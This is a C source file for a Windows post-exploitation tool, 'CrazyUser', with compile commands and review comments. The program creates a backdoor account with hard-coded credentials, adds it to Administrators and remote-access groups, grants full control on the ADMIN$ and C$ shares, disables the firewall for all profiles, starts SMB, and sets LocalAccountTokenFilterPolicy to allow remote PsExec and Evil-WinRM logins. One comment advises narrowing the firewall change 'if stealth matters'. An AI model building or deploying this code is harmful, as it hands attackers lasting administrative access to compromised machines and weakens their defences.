This script creates a new user on a Windows system, adds the user to the Administrators group, grants PsExec and Evil-WinRM access, disables all firewall rules, enables SMB to allow login via PsExec and Evil-WinRM, grants access to administrative shares, and sets LocalAccountTokenFilterPolicy to allow remote administrative connections with full …
/*
**************************************************************************
* *
* Created by Harith Dilshan (h4rithd.com) *
* *
* Purpose: *
* This script creates a new user on a Windows system, adds the user *
* to the Administrators group, grants PsExec and Evil-WinRM access, *
* disables all firewall rules, enables SMB to allow login via *
* PsExec and Evil-WinRM, grants access to administrative shares, and *
* sets LocalAccountTokenFilterPolicy to allow remote administrative *
* connections with full token. *
* *
* Compile for 64-bit: *
* x86_64-w64-mingw32-gcc CrazyUser.c -o CrazyUser.exe -lnetapi32 *
* *
* Compile for 32-bit: *
* i686-w64-mingw32-gcc CrazyUser.c -o CrazyUser.exe -lnetapi32 *
* *
* Credentials (compiled in as USERNAME / PASSWORD below; they sit in *
* plain text in the resulting binary, so change them before building): *
* Username: h4rithd *
* Password: Password123! *
* *
**************************************************************************
*/
#include <windows.h>
#include <winsvc.h>
#include <lm.h>
#include <stdio.h>
#define BUFFER_SIZE 512
#define USERNAME L"h4rithd"
#define PASSWORD L"Password123!"
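/*
 * Add `username` to the local Administrators group.
 *
 * The group is resolved from its well-known SID (S-1-5-32-544) instead of
 * the English display name, so the call also works on localized Windows
 * installs where the group is not called "Administrators". If the SID
 * lookup fails for any reason the original hard-coded name is used, which
 * is exactly what the previous version always did.
 *
 * username: local account name, as handed to NetUserAdd.
 * Outcome is reported on stdout; there is no return value. Being already a
 * member (ERROR_MEMBER_IN_ALIAS) is reported but not treated as a failure,
 * so a second run of the tool does not look broken.
 *
 * NOTE(review): CreateWellKnownSid / LookupAccountSidW live in advapi32,
 * which mingw-w64 links by default; add -ladvapi32 if your toolchain
 * does not.
 */
void AddUserToAdminGroup(LPWSTR username) {
    BYTE sid_buf[SECURITY_MAX_SID_SIZE];
    DWORD sid_len = sizeof sid_buf;
    WCHAR group[256];
    WCHAR domain[256];
    DWORD group_len = sizeof group / sizeof group[0];
    DWORD domain_len = sizeof domain / sizeof domain[0];
    SID_NAME_USE use;
    LPCWSTR group_name = L"Administrators";   /* fallback if SID lookup fails */

    if (CreateWellKnownSid(WinBuiltinAdministratorsSid, NULL, sid_buf, &sid_len) &&
        LookupAccountSidW(NULL, sid_buf, group, &group_len, domain, &domain_len, &use)) {
        group_name = group;
    }

    LOCALGROUP_MEMBERS_INFO_3 member = { .lgrmi3_domainandname = username };
    NET_API_STATUS status = NetLocalGroupAddMembers(NULL, group_name, 3, (LPBYTE)&member, 1);

    if (status == NERR_Success) {
        wprintf(L"User %s added to %s group successfully.\n", username, group_name);
    } else if (status == ERROR_MEMBER_IN_ALIAS) {
        wprintf(L"User %s is already a member of %s.\n", username, group_name);
    } else {
        wprintf(L"Failed to add user %s to %s group. Error: %lu\n", username, group_name, status);
    }
}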
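/*
 * Add `username` to the secondary local groups the remote-admin tooling
 * relies on (Remote Desktop Users, Distributed COM Users, Performance Log
 * Users), then attempt to grant it full control on the ADMIN$ and C$
 * shares.
 *
 * Group membership now goes through NetLocalGroupAddMembers, the same API
 * AddUserToAdminGroup uses, instead of shelling out to `net localgroup`.
 * That gives a checkable status and removes a quoting bug: every one of
 * these group names contains spaces, and an unquoted
 * `net localgroup Remote Desktop Users <user> /add` is parsed as group
 * "Remote" with three extra member names, so none of the adds could work.
 *
 * The share step still spawns net.exe; the documented syntax is
 * `/GRANT:user,FULL` with no space after the comma (the old ", FULL" made
 * FULL a separate argument). Its exit code is printed rather than ignored.
 *
 * NOTE(review): the group names are the English ones and will not resolve
 * on localized Windows. Access to the hidden administrative shares is
 * normally governed by Administrators membership plus
 * LocalAccountTokenFilterPolicy rather than by share ACLs, so net.exe may
 * reject or ignore the /GRANT on ADMIN$ and C$ — that is why its result is
 * reported but not required.
 *
 * username: local account name. No return value; results go to stdout.
 */
void GrantPsExecAccess(LPWSTR username) {
    static LPCWSTR const groups[] = {
        L"Remote Desktop Users",
        L"Distributed COM Users",
        L"Performance Log Users",
    };
    static LPCWSTR const shares[] = { L"ADMIN$", L"C$" };

    for (size_t i = 0; i < sizeof groups / sizeof groups[0]; i++) {
        LOCALGROUP_MEMBERS_INFO_3 member = { .lgrmi3_domainandname = username };
        NET_API_STATUS status = NetLocalGroupAddMembers(NULL, groups[i], 3, (LPBYTE)&member, 1);
        if (status == NERR_Success) {
            wprintf(L"User %s added to %s group successfully.\n", username, groups[i]);
        } else if (status == ERROR_MEMBER_IN_ALIAS) {
            wprintf(L"User %s is already a member of %s.\n", username, groups[i]);
        } else {
            wprintf(L"Failed to add user %s to %s group. Error: %lu\n", username, groups[i], status);
        }
    }

    for (size_t i = 0; i < sizeof shares / sizeof shares[0]; i++) {
        WCHAR command[BUFFER_SIZE];
        int n = swprintf(command, BUFFER_SIZE, L"net share %s /GRANT:%s,FULL", shares[i], username);
        if (n < 0 || n >= BUFFER_SIZE) {
            /* truncated command line: do not run a half-built command */
            wprintf(L"Share command for %s does not fit in the buffer; skipped.\n", shares[i]);
            continue;
        }
        int rc = _wsystem(command);
        wprintf(L"net share %s /GRANT returned %d.\n", shares[i], rc);
    }
}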
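/*
 * Turn Windows Firewall off for every profile (domain, private, public)
 * via `netsh advfirewall`, and report whether the command succeeded.
 *
 * The previous version discarded netsh's exit status, so a failure (for
 * example when not running elevated) was invisible; it is now printed.
 *
 * NOTE(review): this disables host-wide inbound filtering, not just the
 * SMB/WinRM ports the tool needs, and is the most conspicuous change the
 * tool makes. Consider scoping it to the required ports if stealth
 * matters.
 */
void DisableFirewall(void) {
    int rc = _wsystem(L"netsh advfirewall set allprofiles state off");
    if (rc == 0) {
        wprintf(L"Firewall disabled for all profiles.\n");
    } else {
        wprintf(L"netsh advfirewall failed. Return code: %d\n", rc);
    }
}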
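/* Set one service to auto-start and start it now; each step is reported on stdout. */
static void enable_service(LPCWSTR name) {
    SC_HANDLE scm = OpenSCManagerW(NULL, NULL, SC_MANAGER_CONNECT);
    if (scm == NULL) {
        wprintf(L"OpenSCManager failed. Error: %lu\n", GetLastError());
        return;
    }
    SC_HANDLE svc = OpenServiceW(scm, name, SERVICE_CHANGE_CONFIG | SERVICE_START);
    if (svc == NULL) {
        wprintf(L"OpenService(%s) failed. Error: %lu\n", name, GetLastError());
        CloseServiceHandle(scm);
        return;
    }
    /* only the start type changes; every other configuration field is left as is */
    if (!ChangeServiceConfigW(svc, SERVICE_NO_CHANGE, SERVICE_AUTO_START, SERVICE_NO_CHANGE,
                              NULL, NULL, NULL, NULL, NULL, NULL, NULL)) {
        wprintf(L"Failed to set %s to auto-start. Error: %lu\n", name, GetLastError());
    }
    if (StartServiceW(svc, 0, NULL)) {
        wprintf(L"Service %s started.\n", name);
    } else if (GetLastError() == ERROR_SERVICE_ALREADY_RUNNING) {
        wprintf(L"Service %s is already running.\n", name);
    } else {
        wprintf(L"Failed to start %s. Error: %lu\n", name, GetLastError());
    }
    CloseServiceHandle(svc);
    CloseServiceHandle(scm);
}

/*
 * Make the SMB client (lanmanworkstation) and SMB server (lanmanserver)
 * services auto-start and start them immediately, so the host will accept
 * the SMB sessions that PsExec and admin-share access depend on.
 *
 * Uses the Service Control Manager API instead of spawning sc.exe twice
 * per service, so every step has a checked, reported result. A service
 * that is already running counts as success — the same end state the
 * old `sc start` call reached, but previously its error went unnoticed.
 *
 * NOTE(review): OpenSCManagerW and friends live in advapi32, which
 * mingw-w64 links by default; add -ladvapi32 if your toolchain does not.
 */
void EnableSMB(void) {
    enable_service(L"lanmanworkstation");
    enable_service(L"lanmanserver");
}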
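/*
 * Set HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
 * \LocalAccountTokenFilterPolicy to 1 (REG_DWORD). With it set, local
 * administrator accounts receive a full, unfiltered token over the
 * network, which the remote admin-share / PsExec / WinRM paths need.
 *
 * Writes the value through the registry API instead of spawning reg.exe,
 * so the outcome can be checked and reported. KEY_WOW64_64KEY asks for the
 * native 64-bit view so the 32-bit build behaves the same on 64-bit hosts;
 * the flag is ignored on 32-bit Windows. The key is created if missing,
 * mirroring `reg add`.
 *
 * NOTE(review): RegCreateKeyExW / RegSetValueExW live in advapi32, which
 * mingw-w64 links by default; add -ladvapi32 if your toolchain does not.
 */
void SetLocalAccountTokenFilterPolicy(void) {
    static const WCHAR path[] = L"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System";
    HKEY key = NULL;
    DWORD value = 1;

    LONG rc = RegCreateKeyExW(HKEY_LOCAL_MACHINE, path, 0, NULL, REG_OPTION_NON_VOLATILE,
                              KEY_SET_VALUE | KEY_WOW64_64KEY, NULL, &key, NULL);
    if (rc != ERROR_SUCCESS) {
        wprintf(L"Failed to open the Policies\\System key. Error: %ld\n", rc);
        return;
    }

    rc = RegSetValueExW(key, L"LocalAccountTokenFilterPolicy", 0, REG_DWORD,
                        (const BYTE *)&value, sizeof value);
    RegCloseKey(key);

    if (rc == ERROR_SUCCESS) {
        wprintf(L"LocalAccountTokenFilterPolicy set to 1.\n");
    } else {
        wprintf(L"Failed to set LocalAccountTokenFilterPolicy. Error: %ld\n", rc);
    }
}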
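/*
 * Entry point: create the backdoor account, then open the remote
 * administration paths for it.
 *
 * Sequence: NetUserAdd with the compiled-in USERNAME / PASSWORD, then
 * Administrators and remote-access group membership, firewall off, SMB
 * services on, LocalAccountTokenFilterPolicy = 1.
 *
 * If the account already exists (NERR_UserExists) the remaining steps
 * still run, so the tool can be re-run to repair a partial first run.
 * Any other NetUserAdd failure aborts with exit status 1; the previous
 * version returned 0 in every case, which hid failures from callers.
 * The parameter index NetUserAdd reports on ERROR_INVALID_PARAMETER is
 * printed alongside the error.
 *
 * NOTE(review): must run elevated — the Net* and registry/service calls
 * fail with access-denied otherwise. The credentials are plain string
 * literals and are trivially recoverable from the binary; change them
 * before building. A host with a stricter-than-default password policy
 * may reject PASSWORD (NERR_PasswordTooShort).
 */
int main(void) {
    USER_INFO_1 user_info = {
        .usri1_name = USERNAME,
        .usri1_password = PASSWORD,
        .usri1_priv = USER_PRIV_USER,
        .usri1_comment = L"Created by C program",
        /* UF_SCRIPT is required by NetUserAdd; UF_DONT_EXPIRE_PASSWD keeps the password from expiring */
        .usri1_flags = UF_SCRIPT | UF_DONT_EXPIRE_PASSWD,
    };
    DWORD bad_param = 0;   /* index of the offending field on ERROR_INVALID_PARAMETER */

    NET_API_STATUS status = NetUserAdd(NULL, 1, (LPBYTE)&user_info, &bad_param);
    if (status == NERR_Success) {
        wprintf(L"User %s has been successfully added.\n", user_info.usri1_name);
    } else if (status == NERR_UserExists) {
        wprintf(L"User %s already exists; continuing with the remaining steps.\n", user_info.usri1_name);
    } else {
        wprintf(L"NetUserAdd failed with error: %lu (parameter index %lu)\n", status, bad_param);
        return 1;
    }

    AddUserToAdminGroup(user_info.usri1_name);
    GrantPsExecAccess(user_info.usri1_name);
    DisableFirewall();
    EnableSMB();
    SetLocalAccountTokenFilterPolicy();
    return 0;
}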